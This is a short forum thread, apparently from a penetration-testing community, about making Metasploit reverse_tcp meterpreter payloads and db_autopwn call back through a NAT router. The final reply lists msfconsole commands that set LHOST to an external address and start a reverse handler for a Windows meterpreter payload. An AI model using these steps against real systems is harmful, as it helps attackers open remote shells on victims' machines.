Results 1 to 5 of 5

Thread: Changing LHOST value of the exploit's payload to overcome a NAT situation

Hybrid View

  1. #1
    theyhadsaid
    Guest

    Default Changing LHOST value of the exploit's payload to overcome a NAT situation

    Hi folks.
    Well I searched about this and I couldn't find any working solutions to this.. And I know that many people are looking for a way to handle this but don't know what and which file to modify in msf.
    Let me clarify the problem here...

    First comes the network config:
    Internet <=> Router (WAN IP) <=> BT4 (192.168.2.10)
    Incoming TCP/80 packets destined to WAN IP is forwarded to BT4 so no problem with port forwarding..

    When we create our own payload with msfpayload, we can specify our WAN IP and WAN PORT and then within msfconsole, we configure the handler to bind to our internal ip which is, in this case, 192.168.2.10. When the payload is executed from anywhere else, we are able to obtain a meterpreter session. Because RHOST speaks to our WAN IP. So BT users behind a router trying to achieve client-side experimentations can get this to work with this configuration.

    Here comes the problem:
    But this will NOT work when using exploits or launching db_autopwn with the reverse_tcp payload because we are obliged to set LHOST to our internal ip for handler to bind to this ip and unfortunately, msf will "again" use this LHOST value in exploit's payload and when we launch an exploit then the RHOST will try to connect to the internal ip that we've set..

    I am looking forward to your opinions and workarounds on this.
    Thanks.

  2. #2
    Senior Member
    Join Date
    Feb 2010
    Posts
    146

    Default Re: Changing LHOST value of the exploit's payload to overcome a NAT situation

    did you try setting the global variable in msfconsole before lauching autopwn?
    open source = open minds, human knowledge belongs to the world

  3. #3
    Just burned his ISO
    Join Date
    Feb 2010
    Location
    Arizona
    Posts
    15

    Default Re: Changing LHOST value of the exploit's payload to overcome a NAT situation

    I'm not sure what type of NAT device you're using, but I haven't had any problems launching exploits across a NAT'd connection.

    I believe your problem is with the type of networking equipment you're using... I'm not entirely sure how a "static" NAT differs from port forward (so long as the port forward isn't conditional...)

    ...is your problem specific to db_autopwn?

    regards,

    J

  4. #4
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Changing LHOST value of the exploit's payload to overcome a NAT situation

    Have you tried setting LHOST to 0.0.0.0 ? This tells it to listen to any IP on your box for an incoming connection.

  5. #5
    Just burned his ISO strasharo's Avatar
    Join Date
    Jan 2010
    Posts
    17

    Default Re: Changing LHOST value of the exploit's payload to overcome a NAT situation

    In my opinion a possible solution would be to set the global LHOST variable (as crweedon mentioned) to your external IP address and when the listener starts it will automatically fall back to 0.0.0.0 as l3g10n suggests:
    msf > set LHOST 1.3.3.7
    LHOST => 1.3.3.7
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > exploit

    [-] Handler failed to bind to 1.3.3.7:4444
    [*] Started reverse handler on 0.0.0.0:4444
    [*] Starting the payload handler...
    That way payloads will be generated with your external IP address and the exploit handler will be still able to receive connections. (assuming you've set up correctly the port forwarding on your router).

Similar Threads

  1. Saint exploit
    By 259374 in forum Tool Requests
    Replies: 3
    Last Post: 02-27-2010, 12:17 AM
  2. Exploit database
    By av-35 in forum Beginners Forum
    Replies: 1
    Last Post: 02-19-2010, 07:33 PM
  3. Embedded Payload (javascript)
    By sabotage in forum Beginners Forum
    Replies: 1
    Last Post: 02-16-2010, 06:18 AM
  4. How to import a payload????
    By sab3awi in forum Beginners Forum
    Replies: 3
    Last Post: 02-11-2010, 03:20 PM
  5. Exploit help.
    By sickness in forum Beginners Forum
    Replies: 2
    Last Post: 02-03-2010, 11:15 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •